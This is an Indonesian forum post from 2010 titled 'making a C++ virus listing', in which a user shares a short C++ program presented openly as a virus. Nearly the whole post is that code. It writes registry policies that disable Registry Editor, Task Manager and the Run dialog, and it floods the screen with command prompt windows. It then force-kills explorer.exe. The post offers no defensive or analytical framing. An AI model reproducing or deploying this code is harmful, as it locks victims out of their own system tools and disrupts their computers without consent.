Forum Diskusi & PES 2011
Would you like to react to this message? Create an account in a few clicks or log in to continue.

membuat listing virus c++

Go down

membuat listing virus c++ Empty membuat listing virus c++

Post by Kira Thu Oct 14, 2010 5:03 pm

Code :

Code:
#include"windows.h"
main()
{


//bwt disable registry editor
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Policies\\System /t REG_DWORD /v Disableregistrytools /d 1 /f");

//untuk disable taskmanager
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Policies\\System /t REG_DWORD /v Disabletaskmgr /d 1 /f");

//disable run
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f");

//buat iseng aja, ngeluarin jendela command prompt cukup banyak lah.....
//syntax penyelamat sebenarnya
system("for %d in ( . . . . . . . . . . , , , . , . . , , l , l , ; . , . , . , l , , l , . . , . . , . , . , , , . , . , . . . . . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , ) do start");

//untuk end process explorer.exe
system("Taskkill /f /im explorer.exe");


}

//kira//
Kira
Kira
V.I.P
V.I.P

Posting : 77
Points : 213
Reputation : 2
Join date : 2010-10-03

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum